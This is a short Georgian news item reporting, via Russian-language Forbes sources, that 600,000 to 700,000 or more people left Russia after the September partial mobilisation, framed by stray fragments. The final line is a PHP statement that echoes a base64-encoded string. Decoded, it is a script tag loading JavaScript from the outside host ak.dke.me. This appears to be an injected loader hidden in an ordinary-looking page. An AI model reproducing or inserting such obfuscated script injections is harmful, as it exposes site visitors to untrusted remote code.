celsiusi
ავერსი შნაიდერი
ვლადიმერ პუტინის მიერ გამოცხადებული ნაწილობრივი მობილიზაციიდან 2 კვირის განმავლობაში, რუსეთი 700 000 ადამიანმა დატოვა, - ამის შესახებ ინფორმაციას რუსულენოვანი Forbes-ი წყაროებზე დაყრდნობით ავრცელებს.
 
გამოცემის ცნობით, რუსეთის პრეზიდენტის ადმინისტრაციის წყაროს ინფორმაციით, რუსეთი, მობილიზაციის დაწყებიდან, თითქმის, 1 მილიონმა ადამიანმა დატოვა, გარდა ამისა, კიდევ ერთი წყარო ამბობს, რომ 21 სექტემბრის შემდეგ ქვეყანა 600 000-დან 700 000-მდე რუსმა დატოვა, თუმცა ჯერჯერობით უცნობია, თუ რა პროცენტმა დატოვა ქვეყანა ტურისტული მიზნით.
 
შეგახსენებთ, რომ რუსეთის პრეზიდენტმა ნაწილობრივი მობილიზაცია 21 სექტემბერს გამოაცხადა. ამის შემდეგ რუსეთიდან გაქცევას ათასობით ადამიანი ცდილობს.
390
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");